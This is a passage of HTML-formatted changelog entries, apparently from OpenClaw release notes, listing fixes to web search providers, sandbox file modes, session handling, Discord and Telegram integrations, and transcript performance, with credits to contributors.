<li>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</li>
<li>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</li>
<li>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</li>
<li>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</li>
<li>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</li>
<li>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</li>
<li>Web search/SearXNG/Firecrawl/Kimi: show the SearXNG JSON API <code>search.formats</code> prerequisite, pass through <code>img_src</code> image URLs, fail explicitly when Kimi returns ungrounded answers, keep public provider requests on strict SSRF guards, reject private/loopback/metadata/non-HTTP(S) hosted Firecrawl scrape targets, and allow explicit self-hosted private Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</li>
<li>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</li>
<li>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</li>
<li>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</li>
<li>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</li>
<li>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Web search/Exa/MiniMax: accept Exa <code>webSearch.baseUrl</code> overrides with endpoint-partitioned caches, include MiniMax Search in setup, and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</li>
<li>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</li>
<li>Web search/Providers MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials and derive Coding Plan usage polling from the configured MiniMax base URL, so OAuth-authorized and global setups use the right endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</li>
<li>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</li>
<li>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</li>
<li>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</li>
<li>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</li>
<li>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</li>
<li>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</li>
